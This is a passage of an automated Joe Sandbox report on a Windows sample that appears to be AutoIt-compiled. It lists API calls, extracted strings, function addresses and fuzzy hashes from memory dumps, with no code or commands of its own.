                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Cursor$Load$ErrorInfoLast
                                    • String ID:
                                    • API String ID: 3215588206-0
                                    • Opcode ID: f9f01e14b8d74ebec2b13c5ae292829d8a02ddac53d48f75f29065b8da7fbd8b
                                    • Instruction ID: 938eefcaf344eec8563ae276e576d6089a97a8edff3e5efedcefbb0d220b22da
                                    • Opcode Fuzzy Hash: f9f01e14b8d74ebec2b13c5ae292829d8a02ddac53d48f75f29065b8da7fbd8b
                                    • Instruction Fuzzy Hash: 46416470E083196ADB109FBA8C4996FFFF8EF51B60B10452FE509E7291DAB89401DF51
                                    APIs
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5AAA5
                                    • __swprintf.LIBCMT ref: 00F5AB46
                                    • _wcscmp.LIBCMT ref: 00F5AB59
                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F5ABAE
                                    • _wcscmp.LIBCMT ref: 00F5ABEA
                                    • GetClassNameW.USER32(?,?,00000400), ref: 00F5AC21
                                    • GetDlgCtrlID.USER32(?), ref: 00F5AC73
                                    • GetWindowRect.USER32(?,?), ref: 00F5ACA9
                                    • GetParent.USER32(?), ref: 00F5ACC7
                                    • ScreenToClient.USER32(00000000), ref: 00F5ACCE
                                    • GetClassNameW.USER32(?,?,00000100), ref: 00F5AD48
                                    • _wcscmp.LIBCMT ref: 00F5AD5C
                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00F5AD82
                                    • _wcscmp.LIBCMT ref: 00F5AD96
                                      • Part of subcall function 00F2386C: _iswctype.LIBCMT ref: 00F23874
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                    • String ID: %s%u
                                    • API String ID: 3744389584-679674701
                                    • Opcode ID: 63dbcfa5cc9a7174853b001893a2acae7fc5e3d2e379ad634955186b662c9a14
                                    • Instruction ID: ad8b02330c73bb3c867245ac88797a26983fd826690542f5a3f4d66429a113f4
                                    • Opcode Fuzzy Hash: 63dbcfa5cc9a7174853b001893a2acae7fc5e3d2e379ad634955186b662c9a14
                                    • Instruction Fuzzy Hash: F6A1C471604606AFD714DF24C884BEAB7E8FF44326F104729FE99C2150D734E969EB92
                                    APIs
                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00F5B3DB
                                    • _wcscmp.LIBCMT ref: 00F5B3EC
                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F5B414
                                    • CharUpperBuffW.USER32(?,00000000), ref: 00F5B431
                                    • _wcscmp.LIBCMT ref: 00F5B44F
                                    • _wcsstr.LIBCMT ref: 00F5B460
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B498
                                    • _wcscmp.LIBCMT ref: 00F5B4A8
                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F5B4CF
                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00F5B518
                                    • _wcscmp.LIBCMT ref: 00F5B528
                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00F5B550
                                    • GetWindowRect.USER32(00000004,?), ref: 00F5B5B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                    • String ID: @$ThumbnailClass
                                    • API String ID: 1788623398-1539354611
                                    • Opcode ID: 1ccf2ab57134d54ccb51b99a61d147568901f49131fb3b1e95c3f623976c28b0
                                    • Instruction ID: 21edb2aa0c884e171c0fbcac62e168f91fabdbc89b7b0f6265b1b6df7c88ffcc
                                    • Opcode Fuzzy Hash: 1ccf2ab57134d54ccb51b99a61d147568901f49131fb3b1e95c3f623976c28b0
                                    • Instruction Fuzzy Hash: C681E3714083099FDB14CF10C885FAA7BE8EF44325F1881A9FE858A096EB34DD4DEB61
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                    • API String ID: 1038674560-1810252412
                                    • Opcode ID: c602471600ef33a7514b16e1efcd976faacd0394f355923653278ff337657a03
                                    • Instruction ID: 14f250b5489ae1f8a941ebf6302a6d335bb0fdc64ceb8b108a5cc69b973b3c1a
                                    • Opcode Fuzzy Hash: c602471600ef33a7514b16e1efcd976faacd0394f355923653278ff337657a03
                                    • Instruction Fuzzy Hash: A531E631E08305A6DB15FA61CD43FEE77A59F24751F600029FA41710D1EFA9AE08FDA2
                                    APIs
                                    • LoadIconW.USER32(00000063), ref: 00F5C4D4
                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F5C4E6
                                    • SetWindowTextW.USER32(?,?), ref: 00F5C4FD
                                    • GetDlgItem.USER32(?,000003EA), ref: 00F5C512
                                    • SetWindowTextW.USER32(00000000,?), ref: 00F5C518
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C528
                                    • SetWindowTextW.USER32(00000000,?), ref: 00F5C52E
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F5C54F
                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F5C569
                                    • GetWindowRect.USER32(?,?), ref: 00F5C572
                                    • SetWindowTextW.USER32(?,?), ref: 00F5C5DD
                                    • GetDesktopWindow.USER32 ref: 00F5C5E3
                                    • GetWindowRect.USER32(00000000), ref: 00F5C5EA
                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00F5C636
                                    • GetClientRect.USER32(?,?), ref: 00F5C643
                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00F5C668
                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F5C693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                    • String ID:
                                    • API String ID: 3869813825-0
                                    • Opcode ID: 2bb9d2f61da70bb1429f7f08812a924df524020bd00e812cf7c4a670be985876
                                    • Instruction ID: 5be3a12a24c019350ff126e638978e88b9d4029dc236dbe3bfe3756535da7801
                                    • Opcode Fuzzy Hash: 2bb9d2f61da70bb1429f7f08812a924df524020bd00e812cf7c4a670be985876
                                    • Instruction Fuzzy Hash: 6E518171900709EFDB20DFA8CD85BAEBBF5FF04705F004528E687A25A0D774A949EB50
                                    APIs
                                    • _memset.LIBCMT ref: 00F8A4C8
                                    • DestroyWindow.USER32(?,?), ref: 00F8A542
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F8A5BC
                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F8A5DE
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A5F1
                                    • DestroyWindow.USER32(00000000), ref: 00F8A613
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F00000,00000000), ref: 00F8A64A
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F8A663
                                    • GetDesktopWindow.USER32 ref: 00F8A67C
                                    • GetWindowRect.USER32(00000000), ref: 00F8A683
                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F8A69B
                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F8A6B3
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                    • String ID: 0$tooltips_class32
                                    • API String ID: 1297703922-3619404913
                                    • Opcode ID: b7972920fcef1214787d533e1f45515cd3d6dfabdd80ef6573ef81826d61cba9
                                    • Instruction ID: 11c207050925302fb53f8c6c4b7b02a62476ec0ec92d6cb1071129c9b6076ac9
                                    • Opcode Fuzzy Hash: b7972920fcef1214787d533e1f45515cd3d6dfabdd80ef6573ef81826d61cba9
                                    • Instruction Fuzzy Hash: 52718D71544209AFE720DF28CC49FAA7BE5FF88314F08452DF985872A1E774E946EB12
                                    APIs
                                    • CharUpperBuffW.USER32(?,?), ref: 00F846AB
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F846F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharMessageSendUpper
                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                    • API String ID: 3974292440-4258414348
                                    • Opcode ID: be5b0ddcfa1b379dca7442105324315c6b496db89c645dbff30b11cc7c4ab9cc
                                    • Instruction ID: 07dc0b80c0088e9cad880e25e23c0290dc719c0afa7e1fb4040c3e6ec1f4c053
                                    • Opcode Fuzzy Hash: be5b0ddcfa1b379dca7442105324315c6b496db89c645dbff30b11cc7c4ab9cc
                                    • Instruction Fuzzy Hash: 67916C356083129FCB14EF24C851AAAB7A1AF84314F04445CF8965B3A3DB78FD4AFB81
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F8BB6E
                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F89431), ref: 00F8BBCA
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8BC03
                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F8BC46
                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F8BC7D
                                    • FreeLibrary.KERNEL32(?), ref: 00F8BC89
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F8BC99
                                    • DestroyCursor.USER32(?), ref: 00F8BCA8
                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F8BCC5
                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F8BCD1
                                      • Part of subcall function 00F2313D: __wcsicmp_l.LIBCMT ref: 00F231C6
                                     Memory Dump Source
                                     • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                    • String ID: .dll$.exe$.icl
                                    • API String ID: 3907162815-1154884017
                                    • Opcode ID: 7c2613964908b9472012a5633a1ab78a46cebc63e51e334135cdcf03690bb867
                                    • Instruction ID: ca3b56948900441423349b4efc3e363762d3b2d4d07f7976dba03d868de0412b
                                    • Opcode Fuzzy Hash: 7c2613964908b9472012a5633a1ab78a46cebc63e51e334135cdcf03690bb867
                                    • Instruction Fuzzy Hash: B961D071A00619BEEB14EF64CC85FFE77A8FB08720F104115F815D61D1DB78A994EBA0
                                    APIs
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CharLowerBuffW.USER32(?,?), ref: 00F6A636
                                    • GetDriveTypeW.KERNEL32 ref: 00F6A683
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A6CB
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A702
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6A730
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                    Similarity
                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                    • API String ID: 2698844021-4113822522
                                    • Opcode ID: b402456e3efb5a9034179eb5a2dba72eb95df6c21d7291e0608938ac24ab4068
                                    • Instruction ID: 8d3c21fc8c70608f834cf0f9f764b2a43575fa989c18da48becb7bccb0fbb3cb
                                    • Opcode Fuzzy Hash: b402456e3efb5a9034179eb5a2dba72eb95df6c21d7291e0608938ac24ab4068
                                    • Instruction Fuzzy Hash: 535149715083059FC700EF24CC8186AB7E4EF98718F04496CF896572A2DB35EE0AEF92
                                    APIs
                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F6A47A
                                    • __swprintf.LIBCMT ref: 00F6A49C
                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F6A4D9
                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F6A4FE
                                    • _memset.LIBCMT ref: 00F6A51D
                                    • _wcsncpy.LIBCMT ref: 00F6A559
                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F6A58E
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6A599
                                    • RemoveDirectoryW.KERNEL32(?), ref: 00F6A5A2
                                    • CloseHandle.KERNEL32(00000000), ref: 00F6A5AC
                                    Similarity
                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                    • String ID: :$\$\??\%s
                                    • API String ID: 2733774712-3457252023
                                    • Opcode ID: f3f3ecdace318446fefb834152138a8d87c11d3ab5324ff5d23ab074342bae8a
                                    • Instruction ID: 0e04ff9e1d1a9660aca8f7e9fb0d4b5d53fb603b667e98de69b3e642e0b4ce10
                                    • Opcode Fuzzy Hash: f3f3ecdace318446fefb834152138a8d87c11d3ab5324ff5d23ab074342bae8a
                                    • Instruction Fuzzy Hash: 6C31A2B1900119ABDB20DFA0DC48FFB77BCEF88711F1041B6F509D2160EB749644AB25
                                    APIs
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F58766
                                      • Part of subcall function 00F5874A: GetLastError.KERNEL32(?,00F5822A,?,?,?), ref: 00F58770
                                      • Part of subcall function 00F5874A: GetProcessHeap.KERNEL32(00000008,?,?,00F5822A,?,?,?), ref: 00F5877F
                                      • Part of subcall function 00F5874A: RtlAllocateHeap.NTDLL(00000000,?,00F5822A), ref: 00F58786
                                      • Part of subcall function 00F5874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F5879D
                                      • Part of subcall function 00F587E7: GetProcessHeap.KERNEL32(00000008,00F58240,00000000,00000000,?,00F58240,?), ref: 00F587F3
                                      • Part of subcall function 00F587E7: RtlAllocateHeap.NTDLL(00000000,?,00F58240), ref: 00F587FA
                                      • Part of subcall function 00F587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F58240,?), ref: 00F5880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F58458
                                    • _memset.LIBCMT ref: 00F5846D
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F5848C
                                    • GetLengthSid.ADVAPI32(?), ref: 00F5849D
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F584DA
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F584F6
                                    • GetLengthSid.ADVAPI32(?), ref: 00F58513
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F58522
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F58529
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F5854A
                                    • CopySid.ADVAPI32(00000000), ref: 00F58551
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F58582
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F585A8
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F585BC
                                    Similarity
                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 2347767575-0
                                    • Opcode ID: cd76ecdb4922a695f4b69439685b417dbe7514a3afc5838c65b4b60b33c6025f
                                    • Instruction ID: c3740c61e59ecbb253d513f5b0f7affa08207e0a05f3745d2e34ab54296ecfc7
                                    • Opcode Fuzzy Hash: cd76ecdb4922a695f4b69439685b417dbe7514a3afc5838c65b4b60b33c6025f
                                    • Instruction Fuzzy Hash: B5615E71900209AFDF00DF90DC45AEEBB79FF04361F148169E915B7291EB359A0AEF60
                                    APIs
                                    • GetDC.USER32(00000000), ref: 00F776A2
                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F776AE
                                    • CreateCompatibleDC.GDI32(?), ref: 00F776BA
                                    • SelectObject.GDI32(00000000,?), ref: 00F776C7
                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F7771B
                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F77757
                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F7777B
                                    • SelectObject.GDI32(00000006,?), ref: 00F77783
                                    • DeleteObject.GDI32(?), ref: 00F7778C
                                    • DeleteDC.GDI32(00000006), ref: 00F77793
                                    • ReleaseDC.USER32(00000000,?), ref: 00F7779E
                                    Similarity
                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                    • String ID: (
                                    • API String ID: 2598888154-3887548279
                                    • Opcode ID: 34909322893d2328cde08602e29461668860a2b9fc54a64fd0eedb5021ce13f2
                                    • Instruction ID: f35cf4efd9dff9e6eff2d30dca5f8263e4f95c26106073dafcbc4de70d97596e
                                    • Opcode Fuzzy Hash: 34909322893d2328cde08602e29461668860a2b9fc54a64fd0eedb5021ce13f2
                                    • Instruction Fuzzy Hash: 37514975904309EFCB15DFA8CC84EAEBBB9EF48310F14852EF94A97210D731A845DB60
                                    APIs
                                    • LoadStringW.USER32(00000066,?,00000FFF,00F8FB78), ref: 00F6A0FC
                                      • Part of subcall function 00F07F41: _memmove.LIBCMT ref: 00F07F82
                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00F6A11E
                                    • __swprintf.LIBCMT ref: 00F6A177
                                    • __swprintf.LIBCMT ref: 00F6A190
                                    • _wprintf.LIBCMT ref: 00F6A246
                                    • _wprintf.LIBCMT ref: 00F6A264
                                    Similarity
                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                    • API String ID: 311963372-2391861430
                                    • Opcode ID: 1af159e9b12e333515a0b1ba25da7a2180e28777cb60d543b6a8e8b9317ef5d7
                                    • Instruction ID: 2c9a170264ec38c52ca91257720656abee34cd297b9919ea8064f620beb0ba71
                                    • Opcode Fuzzy Hash: 1af159e9b12e333515a0b1ba25da7a2180e28777cb60d543b6a8e8b9317ef5d7
                                    • Instruction Fuzzy Hash: 3C514D72D04209AACF15EBA0CD96EEEB779AF05700F1001A5F505720A1EB796F58FFA1
                                    APIs
                                      • Part of subcall function 00F20B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F06C6C,?,00008000), ref: 00F20BB7
                                      • Part of subcall function 00F048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F048A1,?,?,00F037C0,?), ref: 00F048CE
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F06D0D
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F06E5A
                                      • Part of subcall function 00F059CD: _wcscpy.LIBCMT ref: 00F05A05
                                      • Part of subcall function 00F2387D: _iswctype.LIBCMT ref: 00F23885
                                    Similarity
                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                    • API String ID: 537147316-1018226102
                                    • Opcode ID: c46805955dfe0dfd9da79b54a2641be58efa7037f58fbca6d4fceda2c4a00049
                                    • Instruction ID: f3174f8ea851a6b1fa6e0f6903782196d49b1e8ebb5bf7b46946f86310b63fcb
                                    • Opcode Fuzzy Hash: c46805955dfe0dfd9da79b54a2641be58efa7037f58fbca6d4fceda2c4a00049
                                    • Instruction Fuzzy Hash: C0029D315083419FC724EF24C881AAFBBE5BF98764F04491DF486972A1DB38E949FB42
                                    APIs
                                    • _memset.LIBCMT ref: 00F045F9
                                    • GetMenuItemCount.USER32(00FC6890), ref: 00F3D7CD
                                    • GetMenuItemCount.USER32(00FC6890), ref: 00F3D87D
                                    • GetCursorPos.USER32(?), ref: 00F3D8C1
                                    • SetForegroundWindow.USER32(00000000), ref: 00F3D8CA
                                    • TrackPopupMenuEx.USER32(00FC6890,00000000,?,00000000,00000000,00000000), ref: 00F3D8DD
                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F3D8E9
                                    Similarity
                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                    • String ID:
                                    • API String ID: 2751501086-0
                                    • Opcode ID: 3e526d18a29f6a142220520cedfb9431d86f5772b89183f4f8e9eca401d8c01e
                                    • Instruction ID: 48943694828b0d37feb2dbcb7535347220461ce776c7cf543ce14c739fbf04a9
                                    • Opcode Fuzzy Hash: 3e526d18a29f6a142220520cedfb9431d86f5772b89183f4f8e9eca401d8c01e
                                    • Instruction Fuzzy Hash: 70710771A00209BEEB219F14EC45FAAFF65FF05378F244216F615AA1E0C7B66814FB90
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F80038,?,?), ref: 00F810BC
                                    Similarity
                                    • API ID: BuffCharUpper
                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                    • API String ID: 3964851224-909552448
                                    • Opcode ID: f8bd50ba6270f5941499d9f2b1a1de688577fdb2a4c52bb1d4643a831fdcdce4
                                    • Instruction ID: e21ea30f95be606f6e2d5fd10b8bc7af52c2f41629e0513364debf280de616f3
                                    • Opcode Fuzzy Hash: f8bd50ba6270f5941499d9f2b1a1de688577fdb2a4c52bb1d4643a831fdcdce4
                                    • Instruction Fuzzy Hash: AF41783150125E8FDF10FF94EC95AEA3728BF11350F904664EC919B293DB74A91AFBA0
                                    APIs
                                      • Part of subcall function 00F07D2C: _memmove.LIBCMT ref: 00F07D66
                                      • Part of subcall function 00F07A84: _memmove.LIBCMT ref: 00F07B0D
                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F655D2
                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F655E8
                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F655F9
